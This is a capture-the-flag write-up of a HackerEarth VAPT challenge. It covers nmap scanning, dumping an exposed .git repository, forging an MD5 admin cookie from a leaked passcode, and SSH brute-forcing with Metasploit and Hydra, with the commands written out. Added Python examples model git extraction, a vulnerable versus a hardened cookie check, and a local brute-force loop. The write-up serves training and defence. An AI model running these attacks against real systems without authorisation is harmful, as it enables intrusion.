HackerEarth’s Cipher Combat 3.0 - VAPT
Hello Medium!
This write-up is only for educational purposes. Please don’t try it on systems you are not authorised to test.
This write-up is based solely on Kali Linux and its tools.
Task 1 : nmap -A -p- -T3 [IP]
nmap is the tool used to gather information about the IP you want to enumerate. You can run it in any configuration, but this one is a good first pass: run as root, nmap defaults to a TCP SYN (half-open) scan, and the flags below add everything else you want from a first look at the host.
Changes you can try → swap T3 for T1, T2 or T4 (the timing templates run from T0, slowest and stealthiest, to T5, fastest; faster templates finish sooner but are noisier and miss more on unreliable links)
- -A → enable OS detection, version detection, default script scanning and traceroute
- -p- → scan all 65535 TCP ports instead of the default top 1000
Task 2: Getting the info
Look at the script output: nmap has found a git repository for us, an exposed .git directory on the web server (the http-git script that -A runs reports it). Isn’t it just like a jackpot? This task involves checking the repository out and getting whatever information you can from it.
Task 3 : Enumerating The folders
This task was pretty cool! It needs a SINGLE tool → https://github.com/internetwache/GitTools
You can read the documentation and use it.
Step 1 : Use Dumper to download the exposed .git directory (HEAD, refs, the index and every object it can find) from the web server.
Step 2 : Use Extractor to turn the dumped objects back into ordinary files in a folder you can analyze; it writes each commit it finds to its own subfolder.
Use the command tree on the output directory to see the layout.
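GitTools’ documented usage is `gitdumper.sh http://target/.git/ dump` followed by `extractor.sh dump extracted`. To show what Extractor actually does when it rebuilds files from a dumped .git, here is an added Python example (my code, not the page’s and not GitTools’): it decodes loose objects, verifies each object’s SHA-1, and walks commit → tree → blob to recover paths and contents. The repository it reads is constructed in memory with a made-up passcode; it is not the challenge repository.

```python
"""Rebuild files from a dumped .git object store, the way GitTools' Extractor
does, without invoking git. Added example: the repository below is constructed
in memory, with a made-up passcode, and is not the challenge repository."""
import hashlib
import zlib


def make_object(obj_type: str, body: bytes) -> tuple[str, bytes]:
    """Encode a loose object: 'type size\\0' + body; SHA-1 of that is the object
    id, zlib of that is what sits in .git/objects/xx/yyyy... on disk."""
    raw = f"{obj_type} {len(body)}".encode() + b"\0" + body
    return hashlib.sha1(raw).hexdigest(), zlib.compress(raw)


def read_object(compressed: bytes, expected_sha: str) -> tuple[str, bytes]:
    """Decode a loose object and verify its id. A mismatch means the dump is
    incomplete/corrupt or the server handed back a different object."""
    raw = zlib.decompress(compressed)
    if hashlib.sha1(raw).hexdigest() != expected_sha:
        raise ValueError(f"hash mismatch for object {expected_sha}")
    header, body = raw.split(b"\0", 1)
    obj_type, size = header.decode().split(" ")
    if int(size) != len(body):
        raise ValueError(f"size mismatch for object {expected_sha}")
    return obj_type, body


def parse_tree(body: bytes) -> list[tuple[str, str, str]]:
    """Tree entries are 'mode name\\0' followed by a 20-byte binary object id."""
    entries = []
    i = 0
    while i < len(body):
        nul = body.index(b"\0", i)
        mode, name = body[i:nul].decode().split(" ", 1)
        entries.append((mode, name, body[nul + 1:nul + 21].hex()))
        i = nul + 21
    return entries


def extract(store: dict[str, bytes], commit_sha: str) -> dict[str, bytes]:
    """Walk commit -> root tree -> blobs and return {path: content}."""
    obj_type, body = read_object(store[commit_sha], commit_sha)
    if obj_type != "commit":
        raise ValueError(f"{commit_sha} is a {obj_type}, not a commit")
    # the first header line of a commit is 'tree <sha>'
    tree_sha = body.split(b"\n", 1)[0].split(b" ", 1)[1].decode()
    return _extract_tree(store, tree_sha, "")


def _extract_tree(store: dict[str, bytes], tree_sha: str, prefix: str) -> dict[str, bytes]:
    files = {}
    obj_type, body = read_object(store[tree_sha], tree_sha)
    if obj_type != "tree":
        raise ValueError(f"{tree_sha} is a {obj_type}, not a tree")
    for mode, name, sha in parse_tree(body):
        if mode == "40000":  # subdirectory: recurse
            files.update(_extract_tree(store, sha, prefix + name + "/"))
        else:                # regular file (100644/100755) or symlink (120000)
            files[prefix + name] = read_object(store[sha], sha)[1]
    return files


def build_sample_store() -> tuple[dict[str, bytes], str]:
    """Constructed sample repo: one commit containing index.php and
    config/secret.txt. Returns (object store, commit id)."""
    store: dict[str, bytes] = {}

    def put(obj_type: str, body: bytes) -> str:
        sha, compressed = make_object(obj_type, body)
        store[sha] = compressed
        return sha

    index_php = put("blob", b"<?php $passcode = 'sample-passcode'; ?>\n")
    secret = put("blob", b"not-the-real-flag\n")
    config = put("tree", b"100644 secret.txt\0" + bytes.fromhex(secret))
    root = put("tree", b"40000 config\0" + bytes.fromhex(config)
               + b"100644 index.php\0" + bytes.fromhex(index_php))
    commit = put("commit", (f"tree {root}\n"
                            "author dev <dev@example.test> 0 +0000\n"
                            "committer dev <dev@example.test> 0 +0000\n"
                            "\nadd site\n").encode())
    return store, commit


if __name__ == "__main__":
    objects, head = build_sample_store()
    for path, content in sorted(extract(objects, head).items()):
        print(path, "->", content.decode().strip())
```

The hash check is the part worth keeping in mind when a dump is incomplete: Dumper can only fetch objects whose ids it learns from HEAD, refs, packed-refs, the index and other objects, so a missing object shows up here as a KeyError on the store, while a corrupted or substituted one fails the SHA-1 comparison.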
Task 4: Analyze the Files
cat [name shown above]/index.php
This prints the content of index.php on the terminal. Now read the PHP code carefully and find the passcode, and note how the page checks it.
Result → I found that saving the passcode in MD5 format to a cookie in the web browser will do the work for us.
Using JavaScript code → document.cookie = “key=value”
And hence admin access was granted on the given link.
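Why setting one cookie is enough: the server compares a client-controlled cookie against the MD5 of a passcode that is hard-coded in the leaked source, so whoever reads the source can mint the cookie. The added Python example below (mine, not the challenge’s PHP) models that check and, beside it, a version that does not trust the cookie. The passcode value and the cookie name `key` are assumptions standing in for what the real index.php uses.

```python
"""The admin gate described in Task 4: a hard-coded passcode whose MD5 is
compared against a browser cookie, beside a version that does not trust the
cookie. Added example; PASSCODE and the cookie name 'key' are assumptions."""
import hashlib
import hmac
import secrets
from typing import Optional

PASSCODE = "sample-passcode"     # stands in for the value read out of index.php
SESSIONS: dict[str, dict] = {}   # server-side session table for the hardened version


def parse_cookie_header(header: str) -> dict[str, str]:
    """Split 'a=1; b=2' into a dict, roughly what PHP exposes as $_COOKIE."""
    cookies = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            cookies[name] = value
    return cookies


def vulnerable_is_admin(cookie_header: str) -> bool:
    """Mirrors a check like  $_COOKIE['key'] == md5($passcode).
    The expected value is a hash of a constant, so once the passcode (or just
    its MD5) leaks from the repository, anyone can mint the cookie."""
    expected = hashlib.md5(PASSCODE.encode()).hexdigest()
    return parse_cookie_header(cookie_header).get("key") == expected


def forge_cookie() -> str:
    """What document.cookie = "key=<md5>" makes the browser send on the next request."""
    return "key=" + hashlib.md5(PASSCODE.encode()).hexdigest()


def login(passcode_attempt: str) -> Optional[str]:
    """Hardened flow: verify the passcode once, issue a random session id and
    return the cookie to set; None on failure."""
    if not hmac.compare_digest(passcode_attempt.encode(), PASSCODE.encode()):
        return None
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = {"admin": True}
    return "session=" + sid


def hardened_is_admin(cookie_header: str) -> bool:
    """The cookie is only a lookup key; it carries nothing derived from the secret,
    so knowing the source (passcode included) does not let you forge it."""
    sid = parse_cookie_header(cookie_header).get("session")
    return sid is not None and SESSIONS.get(sid, {}).get("admin", False)


if __name__ == "__main__":
    print("forged cookie passes vulnerable check:", vulnerable_is_admin(forge_cookie()))
    print("forged cookie passes hardened check:", hardened_is_admin(forge_cookie()))
```

The session table lives only in memory here; a real deployment would back it with a store and expire entries, but the property that matters is already visible: the hardened check has no value the client can compute from leaked source.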
Task 5: Getting Information through the shell activated by admin
For this I activated the shell, and running various commands showed the users and the various files inside the system.
Task 6 : Finding the Heaven Key
This was really fun, as the link provided wasn’t actually a website but a system itself, with a new IP address.
The initial procedure was the same: run nmap and find the details.
Observation → no web ports are open; the only service nmap shows is ssh.
This task uses Metasploit as the tool (not to be confused with Metasploitable, the deliberately vulnerable VM). You can also try Hydra, a brute-force login tool that supports SSH among many other protocols.
Procedure →
For a deeper understanding you can check → Metasploit
Open a terminal and start Metasploit:
msfconsole // start msf
use auxiliary/scanner/ssh/ssh_login // SSH login scanner
set RHOSTS [IP_of_target] // remote host --> target IP
set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt // one "user password" pair per line
set STOP_ON_SUCCESS true // as the name suggests: stop at the first valid pair
set VERBOSE false // no extra output
run // run the module against the host
Hydra
hydra -f -L /root/username -P /root/wordlist.txt ssh://[IP_Address]
-f → stop as soon as a login/password pair is found
-L/-P → path to the users/passwords dictionaries (every user is tried with every password)
ssh://IP address → service and victim IP address
DAMN! You have just brute-forced the client.
We have a shell now → →
sessions -i 1 // interact with the session ssh_login opened
id // current user and groups
uname -a // kernel and system information
exit // exit the shell
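What ssh_login and hydra both do underneath is a plain loop over candidate credentials that stops at the first success, and the two tools differ in how the candidates are built: USERPASS_FILE is a list of ready-made "user password" pairs, while hydra’s -L/-P tries every user against every password. The added Python example below (my code, not Metasploit’s or Hydra’s) makes that loop and that difference concrete. It never touches the network: the SSH server is a constructed stand-in and the wordlists are inline, so the attempt counts are reproducible.

```python
"""The loop ssh_login and hydra run: walk candidate credentials and stop at the
first success. Added example with no network: the SSH server is a constructed
stand-in and the wordlists are inline, so the counts are reproducible."""
import itertools
from typing import Callable, Iterable

# Constructed sample in Metasploit's USERPASS_FILE format: one "user password" pair per line
ROOT_USERPASS = """root root
root toor
admin admin
root password
"""


def userpass_pairs(text: str) -> list[tuple[str, str]]:
    """Parse a USERPASS_FILE: each non-empty line is a user and a password, split on whitespace."""
    pairs = []
    for line in text.splitlines():
        parts = line.split(None, 1)
        if len(parts) == 2:
            pairs.append((parts[0], parts[1]))
    return pairs


def combos(users: Iterable[str], passwords: Iterable[str]) -> list[tuple[str, str]]:
    """hydra -L/-P semantics: every user is tried with every password."""
    return list(itertools.product(users, passwords))


def brute_force(candidates: Iterable[tuple[str, str]],
                try_login: Callable[[str, str], bool],
                stop_on_success: bool = True) -> tuple[list[tuple[str, str]], int]:
    """Try each (user, password) in order; return (valid pairs found, attempts made).
    stop_on_success mirrors STOP_ON_SUCCESS in msf and -f in hydra."""
    found = []
    attempts = 0
    for user, password in candidates:
        attempts += 1
        if try_login(user, password):
            found.append((user, password))
            if stop_on_success:
                break
    return found, attempts


def make_fake_sshd(valid: dict[str, str]) -> Callable[[str, str], bool]:
    """Constructed stand-in for the target: accepts exactly the given credentials."""
    def try_login(user: str, password: str) -> bool:
        return valid.get(user) == password
    return try_login


if __name__ == "__main__":
    target = make_fake_sshd({"root": "toor"})
    print("USERPASS_FILE:", brute_force(userpass_pairs(ROOT_USERPASS), target))
    print("-L/-P product:", brute_force(combos(["root", "admin"], ["root", "toor"]), target))
```

Against a real host the tools replace try_login with an actual SSH authentication attempt and add threads; the attempt count is the number worth watching, because every attempt is a line in the target’s auth log and may trip a lockout or fail2ban-style ban well before the list is exhausted.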
Thanks For Reading !!
Plz UPVOTE ! 🙇♂️